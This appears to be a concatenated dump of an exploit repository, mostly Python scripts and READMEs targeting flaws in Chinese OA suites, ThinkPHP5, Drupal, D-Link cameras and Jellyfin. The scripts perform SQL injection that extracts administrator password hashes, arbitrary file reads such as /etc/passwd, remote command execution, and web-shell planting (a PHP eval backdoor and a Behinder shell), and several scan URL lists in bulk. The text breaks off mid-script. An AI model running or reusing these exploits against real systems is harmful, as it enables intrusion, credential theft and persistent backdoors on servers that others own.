请输入需要检测的url:http://xxx.xxx.xxx.xxx 50 | [+]目标 http://xxx.xxx.xxx.xxx 存在漏洞 51 | [+] 响应地址: http://xxx.xxx.xxx.xxx/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1)) 52 | ``` 53 | #### 漏洞利用(getshell)脚本 54 | 55 | ``` 56 | ➜ 用友U8_OA_SQL注入 python3 getshell_exp.py 57 | +------------------------------------------ 58 | + Version: 用友 U8 OA test.jsp SQL注入漏洞 59 | + 使用格式: python3 getshell_exp.py 60 | + URL地址: http://xxx.xxx.xxx.xxx 61 | +------------------------------------------ 62 | 请输入需要检测的URL地址:http://xxx.xxx.xxx.xxx 63 | [+]目标 http://xxx.xxx.xxx.xxx 存在SQL注入漏洞 64 | [+]文件写入木马上传成功,上传路径为 http://xxx.xxx.xxx.xxx/yyoa/update_5.jsp 65 | [+]请使用冰蝎连接,密码为: bxmm 66 | ``` 67 | -------------------------------------------------------------------------------- /thinkphp5/tp5-getshell/README.md: -------------------------------------------------------------------------------- 1 | tp5-getshell.py - thinkphp5 rce漏洞检测工具 2 | == 3 | 4 | 5 | ----------------------- 6 | 7 | 8 | # 概述 9 | 10 | 11 | 控制器过滤不严导致rce,漏洞详情参考 12 | 13 | [thinkphp5 RCE漏洞重现及分析](http://www.lsablog.com/networksec/penetration/thinkphp5-rce-analysis/) 14 | 15 |
16 | 本工具支持单url/批量检测,有phpinfo模式、cmd shell模式、getshell(写一句话)模式,批量检测直接使用getshell模式。 17 | 18 |
19 | 20 | ----------------------- 21 | 22 | 23 | 24 | 25 | # 需求 26 | 27 | 28 | python2.7 29 | 30 |
31 | pip install -r requirements.txt 32 | 33 |
34 | 35 | ----------------------- 36 | 37 | 38 | 39 | # 快速开始 40 | 41 | 42 | python tp5-getshell.py -h
43 | 44 | ![](https://github.com/theLSA/tp5-getshell/raw/master/demo/p4.png)
45 |
46 | 单url检测(phpinfo模式)
47 | 48 | 使用4种poc-phpinfo检测
49 | 50 | python tp5-getshell.py -u http://www.xxx.com:8888/think5124/public/
51 | ![](https://github.com/theLSA/tp5-getshell/raw/master/demo/p3.png)
52 |
53 | 54 | 单url检测(getshell模式)
55 | 56 | 使用3种exp进行getshell,遇到先成功的exp就停止,防止重复getshell
57 | 58 | python tp5-getshell.py -u http://www.xxx.com:8888/think5124/public/ –exploit
59 | 60 | ![](https://github.com/theLSA/tp5-getshell/raw/master/demo/p2.png)
61 |
62 | 63 | 单url检测(cmd shell模式)
64 | 65 | python tp5-getshell.py -u http://www.xxx.com/ –cmdshell
66 | 67 | ![](https://github.com/theLSA/tp5-getshell/raw/master/demo/p1.png)
68 |
69 | 70 | 批量检测(getshell)
71 | 72 | 使用3种exp进行getshell,遇到先成功的exp就停止,防止重复getshell
73 | 74 | python tp5-getshell.py -f urls.txt -t 2 -s 10
75 | ![](https://github.com/theLSA/tp5-getshell/raw/master/demo/p0.png)
76 |
77 | 78 | ---------------------- 79 | 80 | # 反馈 81 | 82 | 博客: http://www.lsablog.com/
83 | gmail: lsasguge196@gmail.com
84 | qq: 2894400469@qq.com
85 | issues: https://github.com/theLSA/tp5-getshell/issues 86 | -------------------------------------------------------------------------------- /D-Link_DCS系列监控/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 8 | 9 | def title(): 10 | print('+------------------------------------------') 11 | print('+ \033[34mTitle: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078 \033[0m') 12 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 13 | print('+ \033[36mUrl: http://xxx.xxx.xxx.xxx \033[0m') 14 | print('+------------------------------------------') 15 | 16 | def POC_1(target_url): 17 | vuln_url = target_url + "/config/getuser?index=0" 18 | headers = { 19 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 20 | } 21 | try: 22 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 23 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 24 | print("\033[36m[+] 正在请求 {}/config/getuser?index=0 \033[0m".format(target_url)) 25 | if 'priv' in response.text and response.status_code == 200: 26 | res=response.text.strip() 27 | result=re.findall(r'(.*)\r\npriv',res,re.S) 28 | result=result[0] 29 | print("\033[36m[+] 获取用户名密码:\n{}\033[0m".format(result)) 30 | else: 31 | print("\033[31m[x] 请求失败 \033[0m") 32 | sys.exit(0) 33 | 34 | except Exception as e: 35 | print("\033[31m[x] 请求失败 \033[0m", e) 36 | 37 | 38 | 39 | if __name__ == '__main__': 40 | title() 41 | while True: 42 | target_url = str(input("\033[35m请输入需要检测的url:\033[0m")) 43 | target_url = target_url.strip() 44 | if len(target_url) != 0 and re.match(r'^https?:/{2}\w.+$', target_url): 45 | break 46 | POC_1(target_url) 47 | -------------------------------------------------------------------------------- /泛微OA/泛微OA_V8_SQL注入/weaverSQL_exp.py: -------------------------------------------------------------------------------- 1 | # 泛微OA V8 SQL注入获取管理员(sysadmin)MD5后的密码信息 2 | # fofa: app="泛微-协同办公OA" 3 | 4 | import requests 5 | import urllib3 6 | from multiprocessing import Pool 7 | urllib3.disable_warnings() 8 | 9 | def title(): 10 | print("[----------------------------------------- --------]") 11 | print("[------------ 泛微OA V8 SQL注入 ---------------]") 12 | print("[-------- usage:python3 weaverSQL_exp.py ------]") 13 | print("[------------------------------------------- ------]") 14 | 15 | headers = { 16 | 17 | "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36" 18 | 19 | } 20 | 21 | def target_url(url): 22 | target_url = url + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager" 23 | try: 24 | res = requests.get(url=target_url,headers=headers,verify=False,timeout=10) 25 | if res.status_code == 200: 26 | print(f"\033[32m[+]目标系统: {url} 存在SQL注入!\033[0m") 27 | print("\033[32m[+] 正在查询sysadmin密码信息.......\033[0m") 28 | print(f"\033[32m[+]用户: sysadmin 密码MD5: {res.text.strip()}\033[0m") 29 | print("[---------------------------------------------------------------------]") 30 | with open('result.txt', 'a', encoding='utf8') as re: 31 | re.write("目标 {} 存在SQL注入\n用户名: sysadmin 密码MD5:{}\n\n".format(target_url,res.text.strip())) 32 | else: 33 | print(f"\033[31m[x]目标系统: {url} 不存在SQL注入!\033[0m") 34 | print("[---------------------------------------------------------------------]") 35 | except Exception as e: 36 | print(f"\033[31m[x]目标系统: {url} 存在未知错误!\033[0m\n",e) 37 | print("[---------------------------------------------------------------------]") 38 | 39 | 40 | if __name__ == "__main__": 41 | title() 42 | url = str(input("\033[35m请输入需要测试url地址: \033[0m")) 43 | target_url(url) 44 | 45 | -------------------------------------------------------------------------------- /启莱OA/启莱OA_treelist.aspx_SQL注入/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | 7 | def title(): 8 | print('+------------------------------------------') 9 | print('+ \033[34mVersion: 启莱OA treelist.aspx SQL注入漏洞 \033[0m') 10 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 11 | print('+ \033[36murl地址: http://xxx.xxx.xxx.xxx \033[0m') 12 | print('+------------------------------------------') 13 | 14 | def POC_1(target_url): 15 | while True: 16 | sql = str(input("\033[35m请输入需要执行的sql语句:\033[0m")) 17 | if sql == "exit": 18 | break 19 | vuln_url = target_url + "/client/treelist.aspx?user=' and 1=("+sql+")--&pwd=1" 20 | headers = { 21 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 22 | } 23 | 24 | try: 25 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 26 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 27 | if "nvarchar" in response.text and response.status_code == 500: 28 | print("\033[32m[+]目标 {} 存在SQL注入漏洞\033[0m".format(target_url)) 29 | result = re.findall(r"在将 nvarchar 值 '"+"(.*)"+"' 转换", response.text) 30 | print("\033[32m[+]响应为: {}\033[0m".format(result)) 31 | else: 32 | print("\033[31m[x]目标 {} 不存在漏洞 \033[0m".format(target_url)) 33 | except Exception as e: 34 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(target_url)) 35 | 36 | if __name__ == '__main__': 37 | title() 38 | while True: 39 | target_url = str(input("\033[35m请输入需要检测的url:\033[0m")) 40 | if len(target_url) != 0 and re.match(r'^https?:/{2}\w.+$', target_url): 41 | break 42 | POC_1(target_url) 43 | -------------------------------------------------------------------------------- /泛微OA/ecology_test/ecology_scan.py: -------------------------------------------------------------------------------- 1 | import urllib3 2 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 3 | import requests, sys 4 | 5 | headers = { 6 | 'Content-Type': 'text/xml; charset=utf-8', 7 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 8 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 9 | 'Cache-Control': 'max-age=0', 10 | 'Content-Type': 'application/x-www-form-urlencoded', 11 | 'Upgrade-Insecure-Requests': '1', 12 | 'Content-Length': '578' 13 | } 14 | 15 | url_list = {'url_1':'/bsh.servlet.BshServlet', 'url_2':'/weaver/bsh.servlet.BshServlet', 'url_3':'/weaveroa/bsh.servlet.BshServlet', 'url_4':'/oa/bsh.servlet.BshServlet'} 16 | 17 | payload = {'poc_1':'bsh.script=exec("whoami");&bsh.servlet.output=raw', 'poc_2':'bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.output=raw', 'poc_3':r'bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"command\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami'} 18 | 19 | result = 0 20 | 21 | def test(target): 22 | global result 23 | for url in url_list: 24 | test_url = target + url_list[url] 25 | for i in payload: 26 | try: 27 | rsp = requests.post(url=test_url, data=payload[i], headers=headers, verify=False, timeout=5) 28 | sta = rsp.status_code 29 | num = rsp.text 30 | if sta == 200 and len(num) < 50: 31 | print 'url is ' + test_url + ', payload can use ' + i + ', result is ' + num 32 | result = 1 33 | except Exception: 34 | pass 35 | if result == 0: 36 | print 'not exit!!!' 37 | 38 | if __name__ == '__main__': 39 | print ''' 40 | -------------------------------------- 41 | BeanShell test script by LuckyEast >_< 42 | -------------------------------------- 43 | ''' 44 | target = sys.argv[1] 45 | test(target) 46 | # for line in open(sys.argv[1]).readlines(): 47 | # target=line.strip() 48 | # test(target) 49 | -------------------------------------------------------------------------------- /Jellyfin_任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | 7 | def title(): 8 | print('+------------------------------------------') 9 | print('+ \033[34mVersion: Jellyfin < 10.7.1 \033[0m') 10 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 11 | print('+ \033[36mFile >>> ip.txt \033[0m') 12 | print('+------------------------------------------') 13 | 14 | def POC_1(target_url): 15 | vuln_url = target_url + "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" 16 | headers = { 17 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 18 | } 19 | try: 20 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 21 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=2) 22 | if response.status_code == 200 and "file" in response.text and "extension" in response.text and "font" in response.text: 23 | print("\033[32m[o] 目标 {} 存在漏洞(读取 windows/win.ini), 链接为:{} \033[0m".format(target_url, vuln_url)) 24 | else: 25 | print("\033[31m[x] 目标 {} 不存在漏洞 \033[0m".format(target_url)) 26 | except Exception as e: 27 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url)) 28 | 29 | def Scan(file_name): 30 | with open(file_name, "r", encoding='utf8') as scan_url: 31 | for url in scan_url: 32 | if url[:4] != "http": 33 | url = "https://" + url 34 | url = url.strip('\n') 35 | try: 36 | POC_1(url) 37 | 38 | except Exception as e: 39 | print("\033[31m[x] 请求报错 \033[0m".format(e)) 40 | continue 41 | 42 | if __name__ == '__main__': 43 | title() 44 | file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m")) 45 | Scan(file_name) 46 | -------------------------------------------------------------------------------- /泛微OA/RCE/e-cology-poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import argparse 3 | 4 | def verify(url,payload): 5 | #Furl=url+"/bshservlet/eval" #实验环境 6 | Furl=url+"/weaver/bsh.servlet.BshServle" 7 | with open("vlun_list.txt",'a') as vList: 8 | try: 9 | res = requests.post(Furl, data = payload) 10 | #print(res.text) 11 | if res.status_code == 200 : 12 | if "Error:" not in res.text: 13 | print(url + " is a vlun [Verify Success!]\n") 14 | #print(res.text) 15 | vList.write(url+'\n') 16 | else: 17 | print(url + "Verify Failed! not a vlun\n") 18 | else: 19 | print(str(res.status_code)+url+" Verify Failed! not a vlun \n") 20 | except Exception: 21 | raise Exception("Connet Failed!") 22 | 23 | 24 | 25 | def ecologyexp(urls,mode): 26 | payload={"bsh.script":"exec(\"whoami\")","bsh.servlet.output":"raw"} 27 | if mode == '1': 28 | verify(urls,payload) 29 | elif mode == '2': 30 | with open(urls) as uFile: 31 | for url in uFile.readlines(): 32 | try: 33 | verify(url,payload) 34 | except Exception as e: 35 | print(e) 36 | continue 37 | else: 38 | pass 39 | 40 | parser = argparse.ArgumentParser(description='e-cology verify',epilog="python e-cology-EXP.py -u url -m 1 || python e-cology-EXP.py -ul url.txt -m 2") 41 | parser.add_argument('--url', '-u', help='url 属性,需检测站点的url') 42 | parser.add_argument('--mode', '-m', help='mode 属性,单点检测||批量检测{1:url,2:urlList}', default='1') 43 | parser.add_argument('--urlList', '-ul', help='urlList 属性,url列表') 44 | parser.add_argument('--level', '-lv', help='level 属性,普通检测||高级检测{1:normal,2:pro}', default='1') 45 | args = parser.parse_args() 46 | 47 | 48 | 49 | if __name__ == '__main__': 50 | with open("vlun_list.txt",'w') as vF: 51 | vF.write("vlun_list\n") 52 | 53 | try: 54 | if args.urlList is not None: 55 | ecologyexp(args.urlList,args.mode) 56 | else: 57 | ecologyexp(args.url,args.mode) 58 | except Exception as e: 59 | print(e) 60 | -------------------------------------------------------------------------------- /Drupal/CVE-2019-6340/CVE-2019-6340.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import re 4 | 5 | # url = "http://47.75.157.227" 6 | url = sys.argv[1] 7 | url_dir = "/node/" 8 | vuln_url = url + url_dir 9 | print r''' 10 | ______ ________ ___ ____ _______ __________ __ __ ____ 11 | / ____/ | / / ____/ |__ \ / __ < / __ \ / ___/__ // // / / __ \ 12 | / / | | / / __/________/ // / / / / /_/ /_____/ __ \ /_ </ // /_/ / / / 13 | / /___ | |/ / /__/_____/ __// /_/ / /\__, /_____/ /_/ /__/ /__ __/ /_/ / 14 | \____/ |___/_____/ /____/\____/_//____/ \____/____/ /_/ \____/ 15 | 16 | 17 | Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340 18 | 19 | jas502n 20 | ''' 21 | print "\n\nExample: python CVE-2019-6340.py url cmd\n" 22 | print ">>>Vuln Url=%s" % vuln_url 23 | 24 | querystring = {"_format":"hal_json"} 25 | cmd = sys.argv[2] 26 | cmd_lenght = len(cmd) 27 | payload = "{\r\n \"link\": [\r\n {\r\n \"value\": \"link\",\r\n \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n }\r\n ],\r\n \"_links\": {\r\n \"type\": {\r\n \"href\": \"http://localhost/rest/type/shortcut/default\"\r\n }\r\n }\r\n}" % (cmd_lenght,cmd) 28 | 29 | headers = { 30 | 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", 31 | 'Connection': "close", 32 | 'Content-Type': "application/hal+json", 33 | 'Accept': "*/*", 34 | 'Cache-Control': "no-cache" 35 | } 36 | 37 | response = requests.request("POST", vuln_url, data=payload, headers=headers, params=querystring) 38 | # print(response.text) 39 | if response.status_code==403 and "u0027access" in response.text : 40 | print "\n>>>>Exit CVE-2019-6340 RCE Vuln!\n" 41 | m = re.findall('.*permissions."}(.*)',response.text,re.S) 42 | print m[0] 43 | 44 | else: 45 | print "No Vuln Exit!" 46 | -------------------------------------------------------------------------------- /蓝凌OA/蓝凌OA_custom.jsp 任意文件读取漏洞/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | #-*- coding:utf-8 -*- 3 | 4 | import base64 5 | import requests 6 | import random 7 | import re 8 | import json 9 | import sys 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | 12 | def title(): 13 | print('+------------------------------------------') 14 | print('+ \033[34mVersion: 蓝凌OA 任意文件读取漏洞 \033[0m') 15 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 16 | print('+ \033[36mUrl: http://xxx.xxx.xxx.xxx \033[0m') 17 | print('+------------------------------------------') 18 | 19 | 20 | def get_ua(): 21 | first_num = random.randint(55, 62) 22 | third_num = random.randint(0, 3200) 23 | fourth_num = random.randint(0, 140) 24 | os_type = [ 25 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 26 | '(Macintosh; Intel Mac OS X 10_12_6)' 27 | ] 28 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 29 | 30 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 31 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 32 | ) 33 | return ua 34 | 35 | 36 | 37 | def POC_1(target_url): 38 | vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp" 39 | headers = { 40 | "User-Agent": get_ua(), 41 | "Content-Type": "application/x-www-form-urlencoded" 42 | } 43 | while True: 44 | filename = str(input("\033[35m请输入需要读取的文件根路径+文件名(如:/etc/passwd):\033[0m")) 45 | if filename == "exit": 46 | break 47 | data = 'var={"body":{"file":"file://'+filename+'"}}' 48 | try: 49 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 50 | response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10) 51 | print("\033[36m[+] 正在请求 {}/sys/ui/extend/varkind/custom.jsp \033[0m".format(target_url)) 52 | if "root:" in response.text and response.status_code == 200: 53 | print("\033[36m[+] 成功读取"+filename+"\n[+] 响应为:{} \033[0m".format(response.text)) 54 | except Exception as e: 55 | print("\033[31m[x] 请求失败:{} \033[0m".format(e)) 56 | 57 | if __name__ == '__main__': 58 | title() 59 | while True: 60 | target_url = str(input("\033[35m请输入需要检测的url:\033[0m")) 61 | if target_url == "exit": 62 | break 63 | POC_1(target_url) 64 | -------------------------------------------------------------------------------- /Drupal/CVE-2018-7600-Drupal7/CVE-2018-7600-Drupal7-EXP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | ''' 5 | ____ _ _ _ _ __ __ _ 6 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 7 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 8 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 9 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 10 | ''' 11 | 12 | import re 13 | import requests 14 | from multiprocessing import Pool, Manager 15 | 16 | headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",} 17 | 18 | def saveinfo(result): 19 | if result: 20 | fw=open('result.txt','a') 21 | fw.write(result+'\n') 22 | fw.close() 23 | 24 | def poc(target,q): 25 | print('加载目标:'+target) 26 | requests.packages.urllib3.disable_warnings() 27 | get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#type]':'markup', 'name[#markup]': 'whoami'} 28 | post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'} 29 | try: 30 | r = requests.post(target, params=get_params, data=post_params, verify=False,allow_redirects=False) 31 | rule1 = re.compile(r'<input type="hidden" name="form_build_id" value="(.*?)" />') 32 | form_build_id = rule1.findall(r.text) 33 | if form_build_id: 34 | get_params = {'q':'file/ajax/name/#value/' + form_build_id[0]} 35 | post_params = {'form_build_id':form_build_id[0]} 36 | r = requests.post(target, params=get_params, data=post_params, verify=False) 37 | rule2 = re.compile(r'(.*?)\[{"command":"settings","settings":.*?') 38 | parsed_result=rule2.findall(r.text.replace('\n','').replace(' ','').replace('\r','').replace('\t','')) 39 | if parsed_result and len(parsed_result[0])>0: 40 | print(("Found a vulnerable target:"+target+"\tPermissions of the current user is:"+parsed_result[0])) 41 | return ("Found a vulnerable target:"+target+"\tPermissions of the current user is:"+parsed_result[0]) 42 | except: 43 | pass 44 | q.put(target) 45 | 46 | 47 | def poolmana(): 48 | p = Pool(30) 49 | q = Manager().Queue() 50 | fr = open('target.txt', 'r') 51 | ips=fr.readlines() 52 | fr.close() 53 | for i in ips: 54 | i=i.replace('\n','') 55 | p.apply_async(poc, args=(i, q,),callback=saveinfo) 56 | p.close() 57 | p.join() 58 | 59 | def run(): 60 | poolmana() 61 | 62 | 63 | if __name__ == '__main__': 64 | run() 65 | -------------------------------------------------------------------------------- /泛微OA/ecology_test/Weaver-Ecology-OA_RCE-EXP.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | #coding:utf-8 3 | #Author:Ja0k 4 | #For Weaver-Ecology-OA_RCE 5 | 6 | import urllib3 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | import requests,sys 10 | 11 | headers = { 12 | 'Content-Type': 'text/xml; charset=utf-8', 13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 15 | 'Cache-Control': 'max-age=0', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | 'Upgrade-Insecure-Requests': '1', 18 | 'Content-Length': '578' 19 | } 20 | 21 | proxies= {'http':'http://127.0.0.1:8080'} 22 | 23 | def Poc_check(target): 24 | 25 | Url_Payload1="/bsh.servlet.BshServlet" 26 | Url_Payload2="/weaver/bsh.servlet.BshServlet" 27 | Url_Payload3="/weaveroa/bsh.servlet.BshServlet" 28 | Url_Payload4="/oa/bsh.servlet.BshServlet" 29 | 30 | Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw""" 31 | Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw""" 32 | Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami""" 33 | for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4): 34 | url= target + Url_Payload 35 | for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3): 36 | try: 37 | http_response = requests.post(url,data=Data_payload,headers=headers,verify=False) 38 | #print http_response.status_code 39 | if http_response.status_code == 200: 40 | if ";</script>" not in (http_response.content): 41 | if "Login.jsp" not in (http_response.content): 42 | if "Error" not in (http_response.content): 43 | print "{0} is a E-cologyOA_RCE Vulnerability".format(url) 44 | print "Server Current Username:{0}".format(http_response.content) 45 | elif http_response.status_code == 500: 46 | print "{0}500 maybe is Weaver-EcologyOA,Please confirm by yourself ".format(url) 47 | else: 48 | pass 49 | except Exception,Error: 50 | pass 51 | 52 | if __name__ == '__main__': 53 | for line in open(sys.argv[1]).readlines(): 54 | target=line.strip() 55 | Poc_check(target) 56 | -------------------------------------------------------------------------------- /thinkphp5/thinkphp5_rce/tp5_rce.py: -------------------------------------------------------------------------------- 1 | # /usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | import sys 5 | import requests 6 | 7 | reload(sys) 8 | sys.setdefaultencoding('utf-8') 9 | 10 | def test(url): 11 | payload = ['',r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1", 12 | r"/?s=index/\think\Request/input&filter=phpinfo&data=1", 13 | r"/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1", 14 | r"/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E", 15 | r"/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E"] 16 | 17 | for i in range(1,6): 18 | url += payload[i] 19 | #print url 20 | try: 21 | r = requests.get(url,verify=False) 22 | if 'PHP Version' in r.text: 23 | return i 24 | else: 25 | return False 26 | except: 27 | print '[!] Destination address cannot be connected' 28 | return False 29 | 30 | def exp(u,i): 31 | payload = ['',r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=", 32 | r"/?s=index/\think\Request/input&filter=system&data=", 33 | r"/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=", 34 | r"/?s=index/\think\template\driver\file/write&cacheFile=fh.php&content=%3C?php @eval($_GET['fuhei']);?%3E", 35 | r"/?s=index/\think\view\driver\Php/display&content=%3C?php @eval($_GET['fuhei']);?%3E"] 36 | while(1): 37 | url = u 38 | command = raw_input("fuhei@tp5_shell$ ") 39 | if command != "exit" and i < 4: 40 | payload1 = payload[i]+str(command) 41 | url += payload1 42 | r = requests.get(url) 43 | print r.text 44 | elif command != "exit" and i == 4: 45 | uu = u+payload[4] 46 | requests.get(uu) 47 | payload2 = "/fh.php?fuhei=system('"+str(command)+"');" 48 | url += payload2 49 | #print url 50 | r = requests.get(url) 51 | print r.text 52 | elif command != "exit" and i == 5: 53 | payload3 += payload[5]+"&fuhei=system('"+str(command)+"');" 54 | url += payload3 55 | r = requests.get(url) 56 | print r.text 57 | else: 58 | break 59 | 60 | if __name__ == '__main__': 61 | url = sys.argv[1] 62 | i = test(url) 63 | if i: 64 | print "[+] Remote code execution vulnerability exists at the target address" 65 | exp(url,i) 66 | else: 67 | print "[-] There is no remote code execution vulnerability in the target address" 68 | -------------------------------------------------------------------------------- /和信创天云桌面系统/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import base64 5 | import re 6 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 7 | 8 | def title(): 9 | print('+------------------------------------------') 10 | print('+ \033[34mVersion: 和信云桌面任意文件上传漏洞 \033[0m') 11 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 12 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 13 | print('+------------------------------------------') 14 | 15 | def POC_1(target_url): 16 | vuln_url = target_url + "/Upload/upload_file.php?l=test" 17 | headers = { 18 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", 19 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv" 20 | } 21 | data = 